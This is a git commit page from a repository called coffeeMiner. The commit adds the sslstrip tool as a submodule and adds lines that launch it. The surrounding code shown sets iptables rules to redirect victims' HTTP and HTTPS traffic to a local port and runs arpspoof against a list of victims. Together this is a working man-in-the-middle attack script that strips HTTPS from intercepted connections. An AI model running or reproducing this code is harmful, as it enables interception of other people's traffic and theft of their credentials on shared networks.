Browse Source

Added SSLStrip

pull/5/head
Amber Gairdner 7 years ago
parent
commit
3024e65fa3
3 changed files with 6 additions and 0 deletions
  1. +3
    -0
      .gitmodules
  2. +2
    -0
      coffeeMiner.py
  3. +1
    -0
      sslstrip

+ 3
- 0
.gitmodules

@ -0,0 +1,3 @@
[submodule "sslstrip"]
path = sslstrip
url = https://github.com/moxie0/sslstrip.git

+ 2
- 0
coffeeMiner.py

@ -34,6 +34,8 @@ os.system("iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE")
os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080")
os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080")
# run SSLStrip on port 8080
os.system("python /sslstrip/sslstrip.py -l 8080")
# run the arpspoof for each victim, each one in a new console
for victim in victims:

+ 1
- 0
sslstrip

@ -0,0 +1 @@
Subproject commit 8dac3873890b25819a1c1191cbd5de96d3dba219

Loading…
Cancel
Save